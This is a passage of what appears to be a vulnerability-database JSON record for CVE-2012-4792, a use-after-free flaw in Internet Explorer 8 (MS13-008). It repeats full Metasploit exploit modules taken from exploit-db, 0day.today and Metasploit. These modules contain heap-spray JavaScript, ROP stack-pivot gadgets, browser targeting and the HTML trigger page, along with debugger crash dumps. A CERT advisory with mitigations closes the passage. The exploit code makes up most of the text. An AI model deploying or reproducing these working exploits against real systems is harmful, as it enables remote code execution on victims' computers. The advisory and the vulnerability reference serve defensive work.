attack if no suitable target found\r\n\t\tif my_target.nil?\r\n\t\t\tprint_error(\"Browser not supported, sending 404: #{agent}\")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\thtml = load_exploit_html(my_target, cli)\r\n\t\thtml = html.gsub(/^\\t\\t/, '')\r\n\t\tprint_status(\"Sending HTML...\")\r\n\t\tsend_response(cli, html, {'Content-Type'=>'text/html'})\r\n\tend\r\n\r\nend\r\n\r\n\r\n=begin\r\n(87c.f40): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400\r\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\nmshtml!CMarkup::OnLoadStatusDone+0x504:\r\n637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=????????\r\n0:008> k\r\nChildEBP RetAddr\r\n020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504\r\n020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47\r\n020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f\r\n020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12\r\n020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb\r\n020bfd78 7e418734 mshtml!GlobalWndProc+0x183\r\n020bfda4 7e418816 USER32!InternalCallWinProc+0x28\r\n020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150\r\n020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306\r\n020bfe7c 01252ec9 USER32!DispatchMessageW+0xf\r\n020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461\r\n020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1\r\n020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab\r\n020bffec 00000000 kernel32!BaseThreadStart+0x37\r\n\r\n0:008> r\r\neax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120\r\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\r\nmshtml!CMarkup::OnLoadStatusDone+0x504:\r\n637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=????????\r\n\r\n=end", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/23754/"}], "zdt": [{"lastseen": "2018-01-10T17:26:01", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CButton object is freed, but a reference is kept and used again during a page reload, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild targeting mainly China/Taiwan/and US-based computers.", "modified": "2012-12-31T00:00:00", "published": "2012-12-31T00:00:00", "id": "1337DAY-ID-20069", "href": "https://0day.today/exploit/description/20069", "type": "zdt", "title": "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\r\n use-after-free condition occurs when a CButton object is freed, but a reference\r\n is kept and used again during a page reload, an invalid memory that's controllable\r\n is used, and allows arbitrary code execution under the context of the user.\r\n\r\n Please note: This vulnerability has been exploited in the wild targeting\r\n mainly China/Taiwan/and US-based computers.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'eromang',\r\n 'mahmud ab rahman',\r\n 'juan vazquez',\r\n 'sinn3r' #Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2012-4792' ],\r\n [ 'US-CERT-VU', '154201' ],\r\n [ 'BID', '57070' ],\r\n [ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],\r\n [ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],\r\n [ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ],\r\n [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ],\r\n [ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 980,\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30\r\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30\r\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30\r\n [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Dec 27 2012\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n ], self.class)\r\n\r\n end\r\n\r\n def get_target(agent)\r\n #If the user is already specified by the user, we'll just use that\r\n return target if target.name != 'Automatic'\r\n\r\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n\r\n ie_name = \"IE #{ie}\"\r\n\r\n case nt\r\n when '5.1'\r\n os_name = 'Windows XP SP3'\r\n when '5.2'\r\n os_name = 'Windows Server 2003'\r\n when '6.0'\r\n os_name = 'Windows Vista'\r\n when '6.1'\r\n os_name = 'Windows 7'\r\n else\r\n # OS not supported\r\n return nil\r\n end\r\n\r\n targets.each do |t|\r\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\r\n print_status(\"Target selected as: #{t.name}\")\r\n return t\r\n end\r\n end\r\n\r\n return nil\r\n end\r\n\r\n def ie_heap_spray(my_target, p)\r\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))\r\n js_nops = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4), Rex::Arch.endian(target.arch))\r\n\r\n # Land the payload at 0x0c0c0b30\r\n js = %Q|\r\n var heap_obj = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_nops}\");\r\n while (nops.length < 0x80000) nops += nops;\r\n var offset = nops.substring(0, #{my_target['Offset']});\r\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x80000-6)/2);\r\n heap_obj.gc();\r\n for (var i=1; i < 0x300; i++) {\r\n heap_obj.alloc(block);\r\n }\r\n |\r\n\r\n js = heaplib(js, {:noobfu => true})\r\n\r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n end\r\n\r\n return js\r\n end\r\n\r\n def get_payload(t, cli)\r\n code = payload.encoded\r\n\r\n # No rop. Just return the payload.\r\n return code if t['Rop'].nil?\r\n\r\n=begin\r\nStack Pivoting to eax:\r\n0:008> db eax\r\n0c0c0b30 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................\r\n0c0c0b40 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................\r\n=end\r\n # Both ROP chains generated by mona.py - See corelan.be\r\n case t['Rop']\r\n when :msvcrt\r\n print_status(\"Using msvcrt ROP\")\r\n if t.name =~ /Windows XP/\r\n stack_pivot = [0x77c15ed6].pack(\"V\") * 54 # ret\r\n stack_pivot << [0x77c2362c].pack(\"V\") # pop ebx, #ret\r\n stack_pivot << [0x77c15ed5].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c\r\n rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})\r\n else\r\n stack_pivot = [0x77bcba5f].pack(\"V\") * 54 # ret\r\n stack_pivot << [0x77bb4158].pack(\"V\") # pop ebx, #ret\r\n stack_pivot << [0x77bcba5e].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c\r\n rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'})\r\n end\r\n else\r\n print_status(\"Using JRE ROP\")\r\n stack_pivot = [0x7c348b06].pack(\"V\") * 54 # ret\r\n stack_pivot << [0x7c341748].pack(\"V\") # pop ebx, #ret\r\n stack_pivot << [0x7c348b05].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c\r\n rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})\r\n end\r\n\r\n return rop_payload\r\n end\r\n\r\n def load_exploit_html(my_target, cli)\r\n\r\n p = get_payload(my_target, cli)\r\n js = ie_heap_spray(my_target, p)\r\n\r\n html = %Q|\r\n <!doctype html>\r\n <html>\r\n <head>\r\n <script>\r\n #{js}\r\n\r\n function exploit()\r\n {\r\n var e0 = null;\r\n var e1 = null;\r\n var e2 = null;\r\n var arrObject = new Array(3000);\r\n var elmObject = new Array(500);\r\n for (var i = 0; i < arrObject.length; i++)\r\n {\r\n arrObject[i] = document.createElement('div');\r\n arrObject[i].className = unescape(\"ababababababababababababababababababababa\");\r\n }\r\n\r\n for (var i = 0; i < arrObject.length; i += 2)\r\n {\r\n arrObject[i].className = null;\r\n }\r\n\r\n CollectGarbage();\r\n\r\n for (var i = 0; i < elmObject.length; i ++)\r\n {\r\n elmObject[i] = document.createElement('button');\r\n }\r\n\r\n for (var i = 1; i < arrObject.length; i += 2)\r\n {\r\n arrObject[i].className = null;\r\n }\r\n\r\n CollectGarbage();\r\n\r\n try {\r\n e0 = document.getElementById(\"a\");\r\n e1 = document.getElementById(\"b\");\r\n e2 = document.createElement(\"q\");\r\n e1.applyElement(e2);\r\n e1.appendChild(document.createElement('button'));\r\n e1.applyElement(e0);\r\n e2.outerText = \"\";\r\n e2.appendChild(document.createElement('body'));\r\n } catch(e) { }\r\n CollectGarbage();\r\n for(var i =0; i < 20; i++)\r\n {\r\n arrObject[i].className = unescape(\"ababababababababababababababababababababa\");\r\n }\r\n var eip = window;\r\n var data = \"#{Rex::Text.rand_text_alpha(41)}\";\r\n eip.location = unescape(\"%u0b30%u0c0c\" + data);\r\n\r\n }\r\n\r\n </script>\r\n </head>\r\n <body onload=\"eval(exploit())\">\r\n <form id=\"a\">\r\n </form>\r\n <dfn id=\"b\">\r\n </dfn>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n uri = request.uri\r\n print_status(\"Requesting: #{uri}\")\r\n\r\n my_target = get_target(agent)\r\n # Avoid the attack if no suitable target found\r\n if my_target.nil?\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n html = load_exploit_html(my_target, cli)\r\n html = html.gsub(/^\\t\\t/, '')\r\n print_status(\"Sending HTML...\")\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n end\r\n\r\nend\r\n\r\n\r\n=begin\r\n(87c.f40): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400\r\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\nmshtml!CMarkup::OnLoadStatusDone+0x504:\r\n637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=????????\r\n0:008> k\r\nChildEBP RetAddr\r\n020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504\r\n020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47\r\n020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f\r\n020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12\r\n020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb\r\n020bfd78 7e418734 mshtml!GlobalWndProc+0x183\r\n020bfda4 7e418816 USER32!InternalCallWinProc+0x28\r\n020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150\r\n020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306\r\n020bfe7c 01252ec9 USER32!DispatchMessageW+0xf\r\n020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461\r\n020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1\r\n020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab\r\n020bffec 00000000 kernel32!BaseThreadStart+0x37\r\n\r\n0:008> r\r\neax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120\r\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\r\nmshtml!CMarkup::OnLoadStatusDone+0x504:\r\n637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=????????\r\n\r\n=end\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20069"}], "metasploit": [{"lastseen": "2019-10-22T01:42:19", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CButton object is freed, but a reference is kept and used again during a page reload, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild targeting mainly China/Taiwan/and US-based computers.\n", "modified": "2017-07-24T13:26:21", "published": "2012-12-31T06:29:19", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CBUTTON_UAF", "href": "", "type": "metasploit", "title": "MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n #include Msf::Exploit::Remote::BrowserAutopwn\n #autopwn_info({\n # :ua_name => HttpClients::IE,\n # :ua_minver => \"8.0\",\n # :ua_maxver => \"8.0\",\n # :javascript => true,\n # :os_name => OperatingSystems::Match::WINDOWS,\n # :rank => GoodRanking\n #})\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CButton object is freed, but a reference\n is kept and used again during a page reload, an invalid memory that's controllable\n is used, and allows arbitrary code execution under the context of the user.\n\n Please note: This vulnerability has been exploited in the wild targeting\n mainly China/Taiwan/and US-based computers.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'eromang',\n 'mahmud ab rahman',\n 'juan vazquez', #Metasploit\n 'sinn3r', #Metasploit\n 'Peter Vreugdenhil' #New trigger & new exploit technique\n ],\n 'References' =>\n [\n [ 'CVE', '2012-4792' ],\n [ 'OSVDB', '88774' ],\n [ 'US-CERT-VU', '154201' ],\n [ 'BID', '57070' ],\n [ 'MSB', 'MS13-008' ],\n [ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],\n [ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],\n [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ],\n [ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ],\n [ 'URL', 'http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/' ],\n [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012' ]\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Dec 27 2012\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n #If the user is already specified by the user, we'll just use that\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def junk(n=4)\n return rand_text_alpha(n).unpack(\"V\")[0].to_i\n end\n\n def nop\n return make_nops(4).unpack(\"V\")[0].to_i\n end\n\n def get_payload(t, cli)\n code = payload.encoded\n\n # No rop. Just return the payload.\n return code if t['Rop'].nil?\n\n # Make post code execution more stable\n code << rand_text_alpha(12000)\n\n msvcrt_align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n java_align = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n\n rop_payload = ''\n\n case t['Rop']\n when :msvcrt\n case t.name\n when 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'})\n when 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'2003'})\n end\n else\n rop_payload = generate_rop_payload('java', java_align + code)\n end\n\n rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n html = %Q|<!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n\n <script>\n #{js_mstime_malloc}\n\n\n function helloWorld() {\n e_form = document.getElementById(\"formelm\");\n e_div = document.getElementById(\"divelm\");\n\n for(i =0; i < 20; i++) {\n document.createElement('button');\n }\n e_div.appendChild(document.createElement('button'));\n e_div.firstChild.applyElement(e_form);\n\n e_div.innerHTML = \"\";\n e_div.appendChild(document.createElement('body'));\n\n CollectGarbage();\n\n p = unescape(\"#{padding}\");\n for (i=0; i < 3; i++) {\n p += unescape(\"#{padding}\");\n }\n p += unescape(\"#{js_payload}\");\n\n fo = unescape(\"#{align_esp}\");\n for (i=0; i < 55; i++) {\n if (i == 54) { fo += unescape(\"#{xchg_esp}\"); }\n else { fo += unescape(\"#{align_esp}\"); }\n }\n\n fo += p;\n\n mstime_malloc({shellcode:fo, heapBlockSize:0x58, objId:\"myanim\"});\n }\n </script>\n </head>\n\n <body onload=\"eval(helloWorld())\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n <div id=\"divelm\"></div>\n <form id=\"formelm\">\n </form>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n # Avoid the attack if no suitable target found\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n\n\n=begin\n(87c.f40): Access violation - code c0000005 (first chance)\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled.\neax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\nmshtml!CMarkup::OnLoadStatusDone+0x504:\n637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=????????\n0:008> k\nChildEBP RetAddr\n020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504\n020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47\n020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f\n020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12\n020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb\n020bfd78 7e418734 mshtml!GlobalWndProc+0x183\n020bfda4 7e418816 USER32!InternalCallWinProc+0x28\n020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150\n020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306\n020bfe7c 01252ec9 USER32!DispatchMessageW+0xf\n020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461\n020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1\n020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab\n020bffec 00000000 kernel32!BaseThreadStart+0x37\n\n0:008> r\neax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\nmshtml!CMarkup::OnLoadStatusDone+0x504:\n637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=????????\n=end\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ie_cbutton_uaf.rb"}], "cert": [{"lastseen": "2019-10-09T19:49:48", "bulletinFamily": "info", "description": "### Overview \n\nMicrosoft Internet Explorer contains a use-after-free vulnerability in the CButton object, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nMicrosoft Internet Explorer contains a use-after-free vulnerability in the mshtml CButton object. Specially-crafted JavaScript can cause Internet Explorer to free the CButton object without removing a pointer, resulting in a state where Internet Explorer may attempt to call an invalid memory address. This memory address may be under the control of the attacker.\n\nThis vulnerability is currently being exploited in the wild, using Adobe Flash to achieve a heap spray and Java to provide Return Oriented Programming (ROP) gadgets. Other proof-of-concept exploits are publicly available that do not use heap spraying. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), Microsoft Office document, an attacker may be able to execute arbitrary code. \n \n--- \n \n### Solution \n\n**Apply an Update** \n \nMicrosoft has released [MS13-008](<https://technet.microsoft.com/en-us/security/bulletin/ms13-008>) to address this vulnerability. Users should run Windows Update to receive the patch. If a user is unable to update, please consider the following workarounds: \n \n--- \n \n**Use the Microsoft Enhanced Mitigation Experience Toolkit** \n \nThe [Microsoft Enhanced Mitigation Experience Toolkit](<http://support.microsoft.com/kb/2458544>) (EMET) can be used to help prevent exploitation of this vulnerability. CERT/CC has created a [video tutorial for setting up EMET 3.0](<http://www.youtube.com/watch?v=28_LUs_g0u4>) on Windows 7. Note that platforms that do not support ASLR, such as Windows XP and Windows Server 2003, will not receive the same level of protection that modern Windows platforms will. \n \n**Apply the Microsoft Fix It** \n \nMicrosoft has provided a \"Fix it\" patch that causes Internet Explorer to safely crash if this vulnerability is attempted to be exploited, rather than resulting in code execution. Please see the [Microsoft SRD blog entry](<http://blogs.technet.com/b/srd/archive/2012/12/31/microsoft-quot-fix-it-quot-available-for-internet-explorer-6-7-and-8.aspx>) for more details. Note that Windows must be fully-patched for the Fix it to be effective. There is also a report that the Fix it [is insufficient](<http://blog.exodusintel.com/2013/01/04/bypassing-microsofts-internet-explorer-0day-fix-it-patch-for-cve-2012-4792/>) to completely address the vulnerability. \n \n**Disable the Flash ActiveX control in Internet Explorer** \n \nWhile it does not address the underlying vulnerability in Internet Explorer, disabling Flash may break some exploits. The Flash ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID: \n\n\n`{D27CDB6E-AE6D-11cf-96B8-444553540000}`More information about how to set the kill bit is available in [Microsoft Support Document 240797](<http://support.microsoft.com/kb/240797>). Alternatively, the following text can be saved as a `.REG` file and imported to set the kill bit for this control: \n\n\n`Windows Registry Editor Version 5.00` \n \n`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{D27CDB6E-AE6D-11cf-96B8-444553540000}]` \n`\"Compatibility Flags\"=dword:00000400` \n`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{D27CDB6E-AE6D-11cf-96B8-444553540000}]` \n`\"Compatibility Flags\"=dword:00000400`**Disable Java in Internet Explorer** \n \nWhile it does not address the underlying vulnerability in Internet Explorer, disabling Java may break some exploits. Starting with Java 7 Update 10, it is possible to disable Java content in web browsers through the Java control panel applet. Please see the [Java documentation](<http://docs.oracle.com/javase/7/docs/technotes/guides/jweb/client-security.html#disable>) for more details. \n--- \n \n### Vendor Information\n\n**Javascript is disabled. Click here to view vendors.**\n\nNo information available at this time. \n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10.0 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 9.0 | E:H/RL:W/RC:UR \nEnvironmental | 9 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://technet.microsoft.com/en-us/security/bulletin/ms13-008>\n * <http://technet.microsoft.com/en-us/security/advisory/2794220>\n * <http://blogs.technet.com/b/srd/archive/2012/12/31/microsoft-quot-fix-it-quot-available-for-internet-explorer-6-7-and-8.aspx>\n * <http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx>\n * <http://blog.exodusintel.com/2013/01/04/bypassing-microsofts-internet-explorer-0day-fix-it-patch-for-cve-2012-4792/>\n * <http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/>\n * 